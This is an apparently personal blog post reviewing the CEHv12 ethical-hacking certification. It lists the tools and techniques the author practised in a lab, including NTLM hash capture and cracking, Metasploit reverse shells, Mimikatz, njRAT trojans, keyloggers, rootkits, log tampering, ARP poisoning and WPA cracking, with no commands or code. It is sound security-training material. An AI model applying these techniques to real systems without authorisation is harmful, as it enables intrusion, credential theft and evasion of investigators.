My Overview of the CEH certification

I recently obtained my CEHv12 certification through lots of studying and preparation for the exam. This article gives a brief summary of the useful concepts and tools we learn.

Environment I enjoyed practicing on - Parrot OS

I explored amazing tools for ethical hacking using the CEH methodology on various targets, where I practiced:

Reconnaissance Techniques –

Gathered information using advanced Google hacking, Whois querying, Netcraft, photon, theHarvester, billcipher, Nslookup, OSINT framework, and more.

Scanning and Enumeration Techniques –

Nmap became my go-to for discovering live hosts, open ports, services, OS banner grabbing, and bypassing IDS/firewalls. I also explored NetBIOS, SNMP, NFS, and DNS enumeration (using dig to check for DNS zone transfers).

Vulnerability Analysis –

Automated tools like OpenVAS, Nessus, and Nikto identified vulnerabilities, supplemented by manual checks with NVD, CWE, CVSS, and CVE databases.

System Hacking Phases and Techniques –

Using gathered information, I attempted system access via:

Password Cracking – Obtained NTLM hashes with Responder, cracked with John the Ripper, and automated brute-force/dictionary attacks using L0phtCrack.

Client-Side Vulnerabilities – Exploited a weakly patched Windows 11 machine using Metasploit to create a malicious payload. Gained remote access via reverse_tcp connection through an Apache2 server and meterpreter session. Despite advances in phishing, attackers still exploit such vulnerabilities with tailored malware.

Escalating Privileges – Used tools like BeRoot, Ghostpack Seatbelt, Named Pipe impersonation, hashdump, Mimikatz, etc.

Maintaining Access – Employed spyware, keyloggers, NTFS data streams, and rootkits to hide files.

Covering Tracks – Disabled/enabled auditing, cleared or manipulated logs to mislead investigators.

Executed malware like a Trojan created with njRAT, allowing control over screen capture, keylogging, and file access after execution. These Trojans are often spread through phishing emails. Using a meterpreter shell, I could upload files, and njRAT would establish a persistent connection, enabling manipulation of directories, processes, and services.

Other hacking topics I enjoyed:

Network Perimeter Hacking –

Learned concepts like password sniffing with Wireshark, ARP poisoning with arpsoof, MITM with Cain and Abel, DHCP starvation with Yersenia, Social Engineering with SE toolkit, DOS/DDOS, and session hijacking, using tools like OWASP ZAP and bettercap.

Wireless Network Hacking –

Studied WEP, WPA/WPA2/WPA3 encryption, cracking WEP by switching to monitor mode (with airmon-ng), and cracking WPA/WPA2 using airodump-ng for PSK handshakes and airocrack-ng to crack them.